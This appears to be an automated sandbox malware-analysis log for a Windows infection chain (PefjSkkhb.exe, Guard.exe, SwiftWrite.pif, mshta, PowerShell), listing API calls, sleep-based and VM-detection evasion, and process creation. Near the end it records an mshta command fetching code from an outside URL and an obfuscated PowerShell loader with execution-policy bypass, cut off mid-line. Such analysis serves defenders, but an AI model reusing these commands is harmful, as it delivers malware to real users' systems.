Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2091Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1184Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5162Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4638Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4697
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5036
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ghep2[1]Jump to dropped file
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_20-99541
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeAPI coverage: 3.7 %
Source: C:\Users\Public\Guard.exeAPI coverage: 4.8 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep count: 2091 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep count: 1184 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1672Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6692Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4832Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep count: 7399 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 2088 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00007FF7C0ECC7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,11_2_00007FF7C0EDA350
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,11_2_00007FF7C0EDA4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED6428 FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7C0ED6428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00007FF7C0EDA874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E92F50 FindFirstFileExW,11_2_00007FF7C0E92F50
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED71F4 FindFirstFileW,FindClose,11_2_00007FF7C0ED71F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00007FF7C0ED72A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00007FF7C0ECB7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00007FF7C0ECBC70
Source: C:\Users\Public\Guard.exeCode function: 20_2_00714005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00714005
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071494A GetFileAttributesW,FindFirstFileW,FindClose,20_2_0071494A
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_0071C2FF
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071CD14 FindFirstFileW,FindClose,20_2_0071CD14
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,20_2_0071CD9F
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0071F5D8
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0071F735
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_0071FA36
Source: C:\Users\Public\Guard.exeCode function: 20_2_00713CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00713CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_002F4005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F494A GetFileAttributesW,FindFirstFileW,FindClose,24_2_002F494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_002FC2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FCD14 FindFirstFileW,FindClose,24_2_002FCD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,24_2_002FCD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_002FF5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_002FF735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_002FFA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_002F3CE2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E71D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,11_2_00007FF7C0E71D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: wscript.exe, 00000017.00000003.2426956978.0000021B89090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: powershell.exe, 00000006.00000002.2256965321.000002701E33E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: mshta.exe, 00000004.00000003.2277213025.000001D0EC5A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280075784.000001D0EC5A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBni
Source: SwiftWrite.pif, 00000018.00000002.3293947279.0000000003F54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~K5
Source: powershell.exe, 00000006.00000002.2256965321.000002701E327000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6EW
Source: powershell.exe, 00000006.00000002.2256965321.000002701E33E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: powershell.exe, 00000012.00000002.2493771492.00000130F99BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW19%SystemRoot%\system32\mswsock.dllon1)
Source: powershell.exe, 00000012.00000002.2488483129.00000130F985C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\P
Source: Guard.exe, 00000014.00000002.3293628451.000000000382E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: mshta.exe, 00000004.00000002.2280293129.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273283593.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2276856139.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3291656704.000001CFD802B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3291604933.000001CFD8013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3293466178.000001CFDD653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000017.00000003.2426956978.0000021B89090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000004.00000002.2280075784.000001D0EC573000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277213025.000001D0EC570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE0A00 BlockInput,11_2_00007FF7C0EE0A00
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E537B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00007FF7C0E537B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E75BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,11_2_00007FF7C0E75BC0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E56D64 LoadLibraryA,GetProcAddress,11_2_00007FF7C0E56D64
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E94318 GetProcessHeap,11_2_00007FF7C0E94318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E98FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7C0E98FE4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E8AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7C0E8AF58
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E757E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7C0E757E4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E759C8 SetUnhandledExceptionFilter,11_2_00007FF7C0E759C8
Source: C:\Users\Public\Guard.exeCode function: 20_2_006DA354 SetUnhandledExceptionFilter,20_2_006DA354
Source: C:\Users\Public\Guard.exeCode function: 20_2_006DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_006DA385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002BA354 SetUnhandledExceptionFilter,24_2_002BA354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002BA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_002BA385

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBCE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00007FF7C0EBCE68
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E537B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00007FF7C0E537B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E74514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00007FF7C0E74514
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE2464 mouse_event,11_2_00007FF7C0EE2464
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = 